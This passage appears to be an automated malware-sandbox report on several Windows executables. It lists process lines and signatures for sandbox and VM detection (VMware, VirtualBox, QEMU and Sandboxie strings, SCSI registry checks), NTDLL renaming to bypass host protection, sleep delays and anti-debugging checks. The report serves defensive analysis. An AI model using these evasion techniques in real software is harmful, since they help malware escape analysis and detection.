                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: 2049.exe PID: 6148, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Renames NTDLL to bypass HIPSShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
                      Source: C:\Windows\explorer.exe TID: 2068Thread sleep count: 579 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 4832Thread sleep count: 181 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 4152Thread sleep count: 228 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6836Thread sleep count: 374 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6844Thread sleep count: 60 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 6840Thread sleep count: 96 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exe TID: 5648Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exe TID: 5412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\B644.exe TID: 7072Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 579Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 374Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6314
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1990
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B206B90 rdtsc 30_2_6B206B90
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 00000007.00000000.281955570.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: explorer.exe, 00000007.00000000.281955570.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: explorer.exe, 00000007.00000000.271865515.000000000EDF0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: explorer.exe, 00000007.00000000.270578238.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                      Source: explorer.exe, 00000007.00000000.270578238.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                      Source: explorer.exe, 00000007.00000000.277240603.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000007.00000000.297424338.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
                      Source: explorer.exe, 00000007.00000000.270578238.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
                      Source: explorer.exe, 00000007.00000000.281955570.0000000008A32000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000007.00000000.297424338.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000007.00000000.278974973.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 2049.exe, 0000001C.00000003.475863155.000000000624B000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: 2049.exe, 0000001C.00000002.509251739.00000000058C0000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA
                      Source: 2049.exe, 0000001C.00000002.502884197.0000000000C8E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeSystem information queried: ModuleInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_00426C50 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00426C50
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B264320 mov eax, dword ptr fs:[00000030h]30_2_6B264320
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28E33D mov eax, dword ptr fs:[00000030h]30_2_6B28E33D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA309 mov eax, dword ptr fs:[00000030h]30_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29131B mov eax, dword ptr fs:[00000030h]30_2_6B29131B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266365 mov eax, dword ptr fs:[00000030h]30_2_6B266365
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266365 mov eax, dword ptr fs:[00000030h]30_2_6B266365
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266365 mov eax, dword ptr fs:[00000030h]30_2_6B266365
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF358 mov eax, dword ptr fs:[00000030h]30_2_6B1DF358
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B7A mov eax, dword ptr fs:[00000030h]30_2_6B203B7A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B7A mov eax, dword ptr fs:[00000030h]30_2_6B203B7A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF340 mov eax, dword ptr fs:[00000030h]30_2_6B1DF340
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DDB40 mov eax, dword ptr fs:[00000030h]30_2_6B1DDB40
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8B58 mov eax, dword ptr fs:[00000030h]30_2_6B2A8B58
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B5A mov eax, dword ptr fs:[00000030h]30_2_6B203B5A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B5A mov eax, dword ptr fs:[00000030h]30_2_6B203B5A
